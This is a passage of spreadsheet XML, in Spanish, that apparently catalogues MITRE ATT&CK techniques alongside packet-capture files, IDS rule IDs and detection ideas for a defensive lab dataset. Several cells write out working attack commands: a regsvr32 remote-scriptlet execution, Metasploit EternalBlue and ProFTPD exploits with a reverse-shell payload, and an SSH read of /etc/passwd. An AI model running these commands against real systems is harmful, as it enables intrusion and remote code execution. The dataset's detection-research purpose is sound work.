    <t>Non-Standard Port</t>
  </si>
  <si>
    <t>T1571</t>
  </si>
  <si>
    <t>Sesión SSH en puerto 2200</t>
  </si>
  <si>
    <t>ssh</t>
  </si>
  <si>
    <t>T1571.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752,2002749,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>13586</t>
    </r>
  </si>
  <si>
    <t>Establecer una sesion SSH sobre un puerto no estandar. Comando: sshpass -p salas ssh salas@192.168.2.2 -p 2200 cat /etc/passwd</t>
  </si>
  <si>
    <t>Defense Evasion, Persistence</t>
  </si>
  <si>
    <t>Traffic Signaling</t>
  </si>
  <si>
    <t>T1205</t>
  </si>
  <si>
    <t>Port Knocking</t>
  </si>
  <si>
    <t>T1205.001</t>
  </si>
  <si>
    <t>Esconder y activar un puerto de forma remota</t>
  </si>
  <si>
    <t>Knockd</t>
  </si>
  <si>
    <t>T1205.001.pcapng</t>
  </si>
  <si>
    <t>Ocultar y activar un puerto remotamente, haciendo primero peticiones a ciertos puertos de forma secuencial. Comando: knock -v 172.16.2.2 7000 8000 9000</t>
  </si>
  <si>
    <t>Indicator Removal</t>
  </si>
  <si>
    <t>T1070</t>
  </si>
  <si>
    <t>Network Share Connection Removal</t>
  </si>
  <si>
    <t>T1070.005</t>
  </si>
  <si>
    <t>Eliminación de conexiones establecidas via Network Share en Windows</t>
  </si>
  <si>
    <t>T1070_indicator-removal-network-share-connection-removal.pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías basada en desconexión repentina procedente de una dirección de varios recursos compartidos</t>
  </si>
  <si>
    <t>Modify Registry</t>
  </si>
  <si>
    <t>T1112</t>
  </si>
  <si>
    <t>Modificación del Registro de forma remota</t>
  </si>
  <si>
    <t>reg (Remoto)</t>
  </si>
  <si>
    <t>T1112_modify-registry.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">44489, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>38319</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">44489, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>38319</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2002752, 2002749, 2044666, 2051116</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Regla que detecte el envío de mensajes con protocolo WINREG o Remote Registry Service </t>
  </si>
  <si>
    <t>Rogue Domain Controller</t>
  </si>
  <si>
    <t>T1207</t>
  </si>
  <si>
    <t>DCShadow: registro de un DC fraudulento para habilitar la manipulación de datos en un entorno Active Directory</t>
  </si>
  <si>
    <t>T1207_rogue-domain-controller.pcapng</t>
  </si>
  <si>
    <t>Regla que detecte una llamada a la función DRSUAPI_REPLICA_ADD (5)</t>
  </si>
  <si>
    <t>System Binary Proxy Execution</t>
  </si>
  <si>
    <t>T1218</t>
  </si>
  <si>
    <t>Regsvr32</t>
  </si>
  <si>
    <t>T1218.010</t>
  </si>
  <si>
    <t>Ejecución de COM scriptlet remoto</t>
  </si>
  <si>
    <t>Regsvr32.exe</t>
  </si>
  <si>
    <t>T1218.010.pcapng</t>
  </si>
  <si>
    <t>Aprovechar vulnerabilidad regsvr32.exe descargando y ejecutando scripts y librerias evadiendo controles de seguridad Windows. Comando: C:\Windows\system32\regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll</t>
  </si>
  <si>
    <t>Template Injection</t>
  </si>
  <si>
    <t>T1221</t>
  </si>
  <si>
    <t>Inyectar un fichero mediante Phishing .docx con macros modificadas que permita pasar desapercibido</t>
  </si>
  <si>
    <t>Sitios web convencionales (Gmail)</t>
  </si>
  <si>
    <t>T1221.pcapng</t>
  </si>
  <si>
    <t>402,50447,2002752,2002749,2013491,2013490,2009768,2100402</t>
  </si>
  <si>
    <t>Detección por lista negra/anomalías. Debería monitorizarse y detectar tráfico de red hacia direcciones o dominios marcados en listas negras. En algún caso concreto, se puede descargar y ejecutar malware por lo que se debe monitorizar y detectar la descarga de este tipo de ficheros</t>
  </si>
  <si>
    <t>Modificación de fichero .docx para, mediante macros, provocar la descarga y ejecución de malware en el equipo víctima</t>
  </si>
  <si>
    <t>Network Boundary Bridging</t>
  </si>
  <si>
    <t>T1599</t>
  </si>
  <si>
    <t>NAT Traversal</t>
  </si>
  <si>
    <t>T1599.001</t>
  </si>
  <si>
    <t>Modificación de políticas de red para permitir tráfico externo a la red  interna</t>
  </si>
  <si>
    <t>iptables</t>
  </si>
  <si>
    <t>NBB1.pcapng, NBB2.pcapng</t>
  </si>
  <si>
    <t>Deteccion por anomalías</t>
  </si>
  <si>
    <t>Equipo intermedio entre red interna de la víctima y el atacante con firewall. El atacante con acceso a este equipo intermedio modifica las reglas del firewall iptables para permitir su tráfico.</t>
  </si>
  <si>
    <t>Salto de VLAN</t>
  </si>
  <si>
    <t>T1599_salto_vlan.pcapng</t>
  </si>
  <si>
    <t>2101620, 2002752, 2002749</t>
  </si>
  <si>
    <t>Detección por anomalías y estudio de topología de red, que detecte posibles vulnerabilidades relacionadas con el etiquetado apilable 802.1Q</t>
  </si>
  <si>
    <t>Build Image on Host</t>
  </si>
  <si>
    <t>T1612</t>
  </si>
  <si>
    <t>Creacion y montado de un contenedor con un servidor SSH sobre un equipo previamente vulnerado</t>
  </si>
  <si>
    <t>DockerAPI, SSH</t>
  </si>
  <si>
    <t>BuildImageOnHostLocal.pcapng, BuildImageOnHostNAT.pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte descargas de contenedores mediante Docker API</t>
  </si>
  <si>
    <t>Construir contenedor sobre el equipo víctima para evitar ser detectados.</t>
  </si>
  <si>
    <t>Lateral Movement</t>
  </si>
  <si>
    <t>Exploitation of Remote Services</t>
  </si>
  <si>
    <t>T1210</t>
  </si>
  <si>
    <t>EternalBlue</t>
  </si>
  <si>
    <t>T1210-eternal_blue.pcapng</t>
  </si>
  <si>
    <t>2102465,2025992,2025649,2025650,42944</t>
  </si>
  <si>
    <t>44487,44485,44489,5730,42944,2102465,2025992,2025649,2025650</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752,2002749</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2044666,2023997,2044665,2102465,2025992,2025649,2025650,2024766,42944,44487,44485,44489,5730</t>
    </r>
  </si>
  <si>
    <t>Regla genérica que detecte uso de EternalBlue</t>
  </si>
  <si>
    <t>Uso de exploit Eternalblue para obtener movimiento lateral y establecimiento de meterpreter. Comando: msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 192.168.2.2; set LHOST 192.168.1.3; run -z; sessions -c getuid; sessions -k 1; exit"</t>
  </si>
  <si>
    <t>Ataque Web</t>
  </si>
  <si>
    <t>DVWA, In-house selenium framework</t>
  </si>
  <si>
    <t>T1210-web_attack-C2018.pcapng</t>
  </si>
  <si>
    <t>Ejecución de código remoto basado en vulnerabilidades de servidor FTP</t>
  </si>
  <si>
    <t>T1210-remote_code_execution.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>34225,34447,34224</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,50447</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752,2002749,2010732,34225,34447,34224,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>50447</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Regla genérica que detecte intento de ejecucion remota de codigo en servidor FTP </t>
  </si>
  <si>
    <t>Uso de comandos SITE/CPFR/CPTO en la version 1.3.5 de ProFTPD  que permite copiar ficheros a cualquier usuario no autenticado. Comando: msfconsole -x "use exploit/unix/ftp/proftpd_modcopy_exec; set RHOSTS 192.168.2.2; set SITEPATH /var/www/html; set LHOST 192.168.1.3; set LPORT 4444; set payload cmd/unix/reverse_perl; run -z; sessions -c ls; sessions -k 1; exit"</t>
  </si>
  <si>
    <t>Remote Service Session Hijacking</t>
  </si>
  <si>
    <t>T1563</t>
  </si>
  <si>
    <t>RDP Hijacking</t>
  </si>
  <si>
    <t>T1563.002</t>
  </si>
  <si>
    <t>Secuestro de sesión RDP mediante tscon.exe</t>
  </si>
  <si>
    <t>tscon.exe</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752, 2002749,2001117,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1448</t>
    </r>
  </si>
  <si>
    <t>Regla genérica para detectar conexiones RDP entre un orígen y un servidor o destino</t>
  </si>
  <si>
    <t>Uso de Windows Server 2012 R2 con DNS, Active Directory y Servicio de Escritorio Remoto</t>
  </si>
  <si>
    <t>Lateral Tool Transfer</t>
  </si>
  <si>
    <t>T1570</t>
  </si>
  <si>
    <t>Transferencia de herramientas para la continuación del ataque entre máquinas utilizando protocolos de compartición de archivos</t>
  </si>
  <si>
    <t>T1570.pcapng</t>
  </si>
  <si>
    <t>Transferencia mediante FTP de ficheros entre dos equipos</t>
  </si>
  <si>
    <t>Internal Spear-phishing</t>
  </si>
  <si>
    <t>T1534</t>
  </si>
  <si>
    <t>Phishing interno entre equipos pertenecientes a un dominio con servidor de correo habilitado</t>
  </si>
  <si>
    <t>MailEnabler, Thunderbird</t>
  </si>
  <si>
    <t>T1534_internal-spearphishing.pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías, análisis de la estructura de correos electrónicos, petición de información confidencial, etc</t>
  </si>
  <si>
    <t>Network Service Discovery</t>
  </si>
  <si>
    <t>T1046</t>
  </si>
  <si>
    <t>Descubrimiento de servicios y version</t>
  </si>
  <si>
    <t>Nikto</t>
  </si>
  <si>
    <t>T1046_version_services_detection1.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2002677, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101071</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2101242, 2027262, 2016141, 2101129, 2100987, 2027265, 2027250, 2018752, 2027263, 2101245, 2027253, 2101145, 2010766, 2100993, 2101256, 2101016, 2019714, 2101402, 2049400, 2009362, 2009361, 2101401, 2030337, 2101244, 2049401, 2011042, 2010963, 2006446, 2006445, 2009714, 2019526, 2101877, 2101108, 2016184, 2100952, 2100977, 2100958, 2100961, 2100965, 2011141, 2011144, 2011142, 2011143, 2021390, 2101201, 2101013, 2101487, 2101018, 2009485, 2102073, 2049402, 2101874, 2100953, 2100951, 2100959, 2100981, 2100982, 2101403, 2016182, 2011696, 2011564, 2009317, 2009318, 2010920, 2009931, 2010475, 2012795, 2009384, 2009391, 2009369, 2012369, 2002879, 2010485, 2008897, 2017442, 2010260, 2009933, 2012013, 2009051, 2010354, 2008833, 2010355, 2009892, 2009316, 2010197, 2010276, 2010466, 2017441, 2010362, 2010473, 2009932, 2011274, 2010124, 2010564, 2010125, 2011384, 2011259, 2017440, 2010484, 2009887, 2009325, 2009326, 2009229, 2009071, 2019524, 2002901, 2014180, 2010254, 2017436</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">50447, 300003, 31940, 2002677, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101071</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2101242, 2027262, 2016141, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101129</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100987</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2027265, 2027250, 2018752, 2027263, 2101245, 2027253, 2101145, 2010766, 2100993, 2101256, 2101016, 2019714, 2101402, 2049400, 2009362, 2009361, 2101401, 2030337, 2101244, 2049401, 2011042, 2010963, 2006446, 2006445, 2009714, 2019526, 2101877, 2101108, 2016184, 2100952, 2100977, 2100958, 2100961, 2100965, 2011141, 2011144, 2011142, 2011143, 2021390, 2101201, 2101013, 2101487, 2101018, 2009485, 2102073, 2049402, 2101874, 2100953, 2100951, 2100959, 2100981, 2100982, 2101403, 2016182, 2011696, 2011564, 2009317, 2009318, 2010920, 2009931, 2010475, 2012795, 2009384, 2009391, 2009369, 2012369, 2002879, 2010485, 2008897, 2017442, 2010260, 2009933, 2012013, 2009051, 2010354, 2008833, 2010355, 2009892, 2009316, 2010197, 2010276, 2010466, 2017441, 2010362, 2010473, 2009932, 2011274, 2010124, 2010564, 2010125, 2011384, 2011259, 2017440, 2010484, 2009887, 2009325, 2009326, 2009229, 2009071, 2019524, 2002901, 2014180, 2010254, 2017436</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">50447, 300003, 31940, 2002752, 2002749, 2002677, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101071</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2101242, 2027262, 2016141, 2003595, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101129</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100987</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2027265, 2027250, 2018752, 2027263, 2009885, 2101245, 2100971, 2027253, 2101852, 2101145, 2010767, 2010766, 2102056, 2101288, 2101738, 2009151, 2001343, 2100993, 2101256, 2003099, 2101016, 2019714, 2101402, 2014379, 2011031, 2049400, 2009362, 2009361, 2101002, 2101945, 2101401, 2101829, 2012911, 2030337, 2101244, 2101122, 2100988, 2049401, 2001949, 2012913, 2011042, 2010963, 2006446, 2006445, 2011040, 2009714, 2001218, 2101827, 2004589, 2019526, 2004592, 2101877, 2101108, 2100915, 2016184, 2009001, 2020296, 2002731, 2100937, 2100952, 2100977, 2100958, 2100961, 2100965, 2101847, 2101111, 2011141, 2011144, 2011142, 2011143, 2002070, 2021390, 2101201, 2101013, 2101193, 2101023, 2101487, 2101018, 2101372, 2009485, 2009884, 2102073, 2102131, 2049402, 2101156, 2101874, 2100953, 2100951, 2100959, 2101110, 2101489, 2100981, 2100982, 2101403, 2101332, 2002133, 2016182, 2011696, 2010377, 2009435, 2003670, 2011564, 2009167, 2010095, 2009317, 2009318, 2003740, 2009397, 2002681, 2010920, 2009931, 2009848, 2009321, 2010475, 2009311, 2009313, 2012795, 2009382, 2009367, 2009757, 2009758, 2009759, 2009755, 2009756, 2009760, 2009754, 2009466, 2009467, 2009468, 2009384, 2009059, 2009060, 2009061, 2009062, 2009877, 2009391, 2009369, 2012369, 2002879, 2010485, 2008897, 2009871, 2009872, 2009873, 2009196, 2003738, 2010099, 2003699, 2017442, 2009459, 2009898, 2009166, 2003677, 2003682, 2003704, 2010260, 2009933, 2012013, 2008826, 2009307, 2009051, 2010354, 2002815, 2009788, 2010027, 2003678, 2003679, 2009225, 2010252, 2008833, 2010355, 2009793, 2003731, 2009163, 2003688, 2003696, 2009892, 2009398, 2002800, 2003703, 2100884, 2003729, 2003728, 2003727, 2003726, 2009316, 2009101, 2010197, 2008904, 2008903, 2010276, 2008900, 2008901, 2008902, 2010126, 2003671, 2010466, 2003739, 2003333, 2008922, 2009427, 2002902, 2008871, 2003680, 2017441, 2003698, 2003701, 2008879, 2010362, 2009381, 2009386, 2010473, 2009188, 2009903, 2008899, 2009180, 2003737, 2003717, 2003517, 2009932, 2011274, 2003732, 2003733, 2003718, 2003700, 2003689, 2009364, 2010124, 2010564, 2010125, 2002996, 2003331, 2011384, 2011259, 2003672, 2003673, 2003674, 2003675, 2003676, 2017440, 2009415, 2003660, 2003661, 2003664, 2010484, 2003662, 2009372, 2003663, 2003665, 2003666, 2003667, 2003668, 2003681, 2003694, 2002898, 2009887, 2003705, 2003706, 2003707, 2003708, 2003715, 2003709, 2003711, 2003713, 2003712, 2003710, 2003714, 2003867, 2003693, 2009370, 2009371, 2008964, 2009504, 2009502, 2009723, 2003702, 2009325, 2009326, 2008962, 2009164, 2003720, 2003719, 2003721, 2009123, 2009506, 2009229, 2003741, 2003743, 2003744, 2003745, 2009071, 2008996, 2009179, 2019524, 2002901, 2009333, 2009733, 2003669, 2009656, 2009653, 2009378, 2009717, 2009379, 2014180, 2010254, 2003716, 2017436, 2003692, 2003747, 2003686, 2009190, 2011160</t>
    </r>
  </si>
  <si>
    <t>Múltiples mecanismos. Por ejemplo, regla que detecte un escaneo de puertos (alto número de peticiones hacia un rango de puertos en poco tiempo)</t>
  </si>
  <si>
    <t>T1046_version_services_detection2.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>384,453,408,451,1421,1420,1418,257,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>598</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010937,2010939,2010938</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2002911</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2010936,2010935,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002910</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2100257,2100598,2009358,2024364,384,453,408,451,1421,1420,1418,257,598</t>
    </r>
  </si>
  <si>
    <t>2010937, 2002910, 2010935</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010937,2010939,2010938,2002911,2010936,2010935,2002910,2100257,2100598</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2009358</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2024364,384,453,408,451,1421,1420,1418,257,598,36650,13586,50447</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100469,2100384,2002752,2002749</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2009582,2000538</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2100453,2100408,2100451,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010937</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2001689</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2010939</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010938</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002911</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2100615,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010936</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010935</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002910</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2101420,2101418,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100257</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100598</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2009358</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2024364,384,453,408,451,1421,1420,1418,257,598,36650,13586,50447</t>
    </r>
  </si>
  <si>
    <t>2100384, 2002752, 2100615, 2009582, 2100469, 2010935, 2100408, 2010937, 2002749, 2002910, 2002911</t>
  </si>
  <si>
    <t>DDos + Escaneo de puertos</t>
  </si>
  <si>
    <t>T1046-C2018-FIX.pcapng</t>
  </si>
  <si>
    <t>2035480, 2025644</t>
  </si>
  <si>
    <t>2002749, 2002752, 2035480, 20000419, 2025644</t>
  </si>
  <si>
    <t>En determinadas circunstancias, si el envío de paquetes constituye una amenaza de denegación de servicio, podría detectarse el envío masivo de paquetes</t>
  </si>
  <si>
    <t>Remote System Discovery</t>
  </si>
  <si>
    <t>T1018</t>
  </si>
  <si>
    <t>Descubrimiento de servicios y puertos</t>
  </si>
  <si>
    <t>T1018.pcapng</t>
  </si>
  <si>
    <t>2010937, 2010935, 2010936, 2010939, 2002910, 200911</t>
  </si>
  <si>
    <t>2010937, 2010935, 2010936, 2010939, 2002910, 200911, 2002752, 2002749, 2101418, 2100615</t>
  </si>
  <si>
    <t>2002752, 2100615, 2010935, 2010937, 2002749, 2002910</t>
  </si>
  <si>
    <t>Regla que detecte envío de mútliples peticiones a un rango de puertos en un tiempo determinado</t>
  </si>
  <si>
    <t>Group Policy Discovery</t>
  </si>
  <si>
    <t>T1615</t>
  </si>
  <si>
    <t>Comandos mediante Powershell para obtener información sobre configuraciones de políticas de grupo</t>
  </si>
  <si>
    <t>T1615.pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías</t>
  </si>
  <si>
    <t>Ejecución de comandos mediante Powershell para comprobar políticas de grupo</t>
  </si>
  <si>
    <t>System Owner</t>
  </si>
  <si>
    <t>T1033</t>
  </si>
  <si>
    <t>Descubrimiento de sesión de usuario en equipo remoto</t>
  </si>
  <si>
    <t>quser, qwinsta</t>
  </si>
  <si>
    <t>T1033_system-owner.pcapng</t>
  </si>
  <si>
    <t>44489, 2002752, 2002749, 2044666, 2051116</t>
  </si>
  <si>
    <t>Regla que detecte múltiples interacciones con la API LSM_API_service del servicio RPC desde el mismo equipo origen.</t>
  </si>
  <si>
    <t>Domain Trust Discovery</t>
  </si>
  <si>
    <t>T1482</t>
  </si>
  <si>
    <t>Descubrimiento de dominios de confianza en entorno Active Directory</t>
  </si>
  <si>
    <t>dsquery</t>
  </si>
  <si>
    <t>T1482_domain-trust-discovery.pcapng</t>
  </si>
  <si>
    <t>Regla personalizada que detecte paquetes LDAP, procedentes de equipos que no son DC en la red (configurable manualmente) y con la cadena objectClass=trustedDomain</t>
  </si>
  <si>
    <t>Exfiltration</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol</t>
  </si>
  <si>
    <t>T1048</t>
  </si>
  <si>
    <t>Exfiltration Over Unencrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t>T1048.003</t>
  </si>
  <si>
    <t>Exfiltración por ICMP</t>
  </si>
  <si>
    <t xml:space="preserve">T1048.003-exfiltration_over_ICMP.pcapng </t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>29456</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,384,408</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>29456</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,384,408</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
